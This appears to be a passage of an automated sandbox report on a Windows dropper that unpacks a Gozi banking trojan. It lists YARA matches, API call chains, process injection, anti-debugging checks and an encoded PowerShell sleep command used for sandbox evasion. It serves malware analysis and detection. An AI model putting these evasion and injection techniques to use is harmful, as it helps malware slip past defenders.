                  Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C512C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF64C512C54
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C511C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF64C511C0C
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C516CA4 0_2_00007FF64C516CA4
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C515D90 0_2_00007FF64C515D90
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C511D28 0_2_00007FF64C511D28
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C5166C4 0_2_00007FF64C5166C4
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C5140C4 0_2_00007FF64C5140C4
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C512DB4 0_2_00007FF64C512DB4
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C513530 0_2_00007FF64C513530
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C511C0C 0_2_00007FF64C511C0C
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 1_2_04C64AA8 1_2_04C64AA8
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 1_2_04C63040 1_2_04C63040
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_01097596 7_2_01097596
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_0109826C 7_2_0109826C
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_01093EEB 7_2_01093EEB
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_00401E0F NtMapViewOfSection,7_2_00401E0F
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_00401B6A GetProcAddress,NtCreateSection,memset,7_2_00401B6A
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_00401178 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,7_2_00401178
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_010960CC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,7_2_010960CC
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_01098491 NtQueryVirtualMemory,7_2_01098491
                  Source: Informazion.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 493846 bytes, 1 file, at 0x2c +A "maintainabovl.exe", ID 1749, number 1, 11597 datablocks, 0x1503 compression
                  Source: Informazion.exe, 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameanimaltech5.exeP. vs Informazion.exe
                  Source: Informazion.exe | Binary or memory string: OriginalFilenameanimaltech5.exeP. vs Informazion.exe
                  Source: Informazion.exe | Virustotal: Detection: 14%
                  Source: Informazion.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Informazion.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown | Process created: C:\Users\user\Desktop\Informazion.exe C:\Users\user\Desktop\Informazion.exe
                  Source: C:\Users\user\Desktop\Informazion.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                  Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\maintainabovl.exe.log
                  Source: C:\Users\user\Desktop\Informazion.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/6@2/5
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C516CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF64C516CA4
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_010931AB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,7_2_010931AB
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:492:120:WilError_01
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C515D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF64C515D90
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: Informazion.exe | Static PE information: Image base 0x140000000 > 0x60000000
                  Source: Informazion.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Informazion.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Informazion.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Informazion.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Informazion.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Informazion.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Informazion.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wextract.pdb source: Informazion.exe
                  Source: Binary string: wextract.pdbGCTL source: Informazion.exe
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp
                  Source: Informazion.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Informazion.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Informazion.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Informazion.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Informazion.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: Yara match | File source: 1.2.maintainabovl.exe.3fd4590.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.c370000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.501526804.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.508878561.000000000C370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: maintainabovl.exe PID: 5976, type: MEMORYSTR
                  Source: maintainabovl.exe.0.dr, Frm/Form1.cs | .Net Code: Heal System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 1.0.maintainabovl.exe.840000.0.unpack, Frm/Form1.cs | .Net Code: Heal System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 1_2_04C62430 push ds; retf 1_2_04C6243E
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 1_2_04C60007 push ds; retf 1_2_04C6003E
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 1_2_04C62A80 push ds; retf 1_2_04C62B7E
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 1_2_04C62B70 push ds; retf 1_2_04C62B7E
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_0109B352 pushfd ; ret 7_2_0109B361
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_0109825B push ecx; ret 7_2_0109826B
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Code function: 7_2_01097E70 push ecx; ret 7_2_01097E79
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C511D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF64C511D28
                  Source: Informazion.exe | Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\Informazion.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                  Source: C:\Users\user\Desktop\Informazion.exe | Code function: 0_2_00007FF64C511684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF64C511684
                  Source: C:\Users\user\Desktop\Informazion.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

                  Hooking and other Techniques for Hiding and Protection

                  Source: Yara match | File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 4740 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 6124 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 5108 Thread sleep count: 61 > 30
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 5108 Thread sleep count: 46 > 30
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe TID: 5108 Thread sleep count: 67 > 30
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9433
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\Desktop\Informazion.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2443
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\Informazion.exe Code function: 0_2_00007FF64C5164E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00007FF64C5164E4
                  Source: C:\Users\user\Desktop\Informazion.exe Code function: 0_2_00007FF64C51204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF64C51204C
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe API call chain: ExitProcess graph end node
                  Source: maintainabovl.exe, 00000001.00000002.498084861.0000000000F34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                  Anti Debugging

                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Users\user\Desktop\Informazion.exe Code function: 0_2_00007FF64C511D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF64C511D28
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\Informazion.exe Code function: 0_2_00007FF64C518790 SetUnhandledExceptionFilter, 0_2_00007FF64C518790
                  Source: C:\Users\user\Desktop\Informazion.exe Code function: 0_2_00007FF64C518494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF64C518494

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Process created: Base64 decoded start-sleep -seconds 38
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Memory written: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                  Source: C:\Users\user\Desktop\Informazion.exe Code function: 0_2_00007FF64C5112EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle, 0_2_00007FF64C5112EC
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
